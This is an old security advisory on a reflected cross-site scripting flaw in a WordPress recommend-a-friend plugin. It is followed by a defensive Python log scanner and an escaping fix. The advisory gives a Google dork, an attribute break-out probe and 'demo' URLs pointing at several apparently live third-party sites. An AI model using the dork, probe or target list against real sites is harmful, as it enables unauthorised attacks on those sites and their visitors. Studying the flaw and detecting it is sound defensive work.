####################
# Exploit Title : WordPress Recommend to a Friend plugin Cross-site scripting
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://wordpress.org/plugins/recommend-a-friend/
# Software Link : http://downloads.wordpress.org/plugin/recommend-a-friend.2.0.2.zip
# Google Dork : inurl:wp-content/plugins/recommend-a-friend/inc
# Date : 2013-12-23
# Tested on : Windows 7
# Discovered by : ACC3SS
------------------------------------------------
#
# Exploit : Cross-site scripting (reflected, via the unescaped current_url parameter)
#
# Location : localhost/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=[xss]
#
# Method : GET
#
# Script For Test : "/>
#
------------------------------------------------
#
# Demo:
#
# http://acpbusinessclimate.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/>
#
# http://chessmaniac.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/>
#
# http://foolsforforests.org/wordpress/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/>
#
# http://thepsychicsline.com/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/>
#
# http://yesmaine.org/wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url= "/>
#
######################

Thanks.

--
Best Regards,
Ashiyane Digital Security Team
http://ashiyane.org/forums
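The advisory's point is that raf_form.php reflects the `current_url` GET parameter into the page without attribute-context escaping, so a value beginning with `"/>` closes the attribute and the tag it sits in. The following is an added example written for this page, not code from the advisory or from the plugin: a small log scanner that flags requests to that endpoint whose decoded `current_url` carries attribute-breaking characters or is not an http(s) URL at all, plus the escaping a safe reflection would apply. The log lines are constructed here in combined log format; the path constant `VULN_PATH` is taken from the advisory, and `safe_attribute_value` uses Python's `html.escape` to stand in for the attribute escaping the plugin should perform (in WordPress that role belongs to `esc_attr()` / `esc_url()`).

```python
import re
from html import escape
from urllib.parse import urlsplit, parse_qs

# Constructed sample access-log lines (combined log format). Addresses, hosts
# and timestamps are made up; they are not from the advisory's demo list.
SAMPLE_LOG = """\
203.0.113.5 - - [23/Dec/2013:10:01:02 +0000] "GET /wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=http%3A%2F%2Fexample.test%2Fpost%2F1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [23/Dec/2013:10:01:07 +0000] "GET /wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=%22%2F%3E HTTP/1.1" 200 601 "-" "curl/7.30"
203.0.113.9 - - [23/Dec/2013:10:01:09 +0000] "GET /wp-content/plugins/recommend-a-friend/inc/raf_form.php?current_url=%27%2F%3E HTTP/1.1" 200 601 "-" "curl/7.30"
198.51.100.2 - - [23/Dec/2013:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Minimal combined-log-format parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Endpoint named in the advisory (path only; the WordPress root may differ per site).
VULN_PATH = "/wp-content/plugins/recommend-a-friend/inc/raf_form.php"

# Characters that let a value escape an HTML attribute or open a new tag.
BREAKOUT_CHARS = set('"\'<>')


def parse_line(line):
    """Return the named fields of one log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decoded_current_url(target):
    """Return the percent-decoded current_url value when the request hits
    raf_form.php, else None. parse_qs does the decoding for us."""
    parts = urlsplit(target)
    if not parts.path.endswith(VULN_PATH):
        return None
    values = parse_qs(parts.query, keep_blank_values=True).get("current_url")
    return values[0] if values else None


def is_suspicious(value):
    """A legitimate current_url is an absolute http(s) URL. Anything carrying
    attribute-breaking characters, or that is not a URL at all, is flagged."""
    if any(c in BREAKOUT_CHARS for c in value):
        return True
    u = urlsplit(value)
    return u.scheme not in ("http", "https") or not u.netloc


def scan_log(text):
    """Scan log text and return (ip, timestamp, decoded value) for each hit."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        value = decoded_current_url(rec["target"])
        if value is not None and is_suspicious(value):
            hits.append((rec["ip"], rec["ts"], value))
    return hits


def safe_attribute_value(value):
    """Attribute-context escaping: the advisory's "/> probe becomes &quot;/&gt;
    and can no longer close the attribute or the tag. This is a Python stand-in
    for the escaping the plugin should apply before echoing the parameter."""
    return escape(value, quote=True)


if __name__ == "__main__":
    for ip, ts, value in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} suspicious current_url={value!r} -> reflected safely as {safe_attribute_value(value)!r}")
```

The scanner decodes before inspecting, so percent-encoded probes (`%22%2F%3E`) and the raw form are caught alike; the URL-shape check in `is_suspicious` catches values that contain no quote or angle bracket but still are not the page address the plugin expects. The escaping shown in `safe_attribute_value` is the mitigation: once the reflected value is escaped for the attribute context, the quote and the closing bracket are rendered as text rather than parsed as markup.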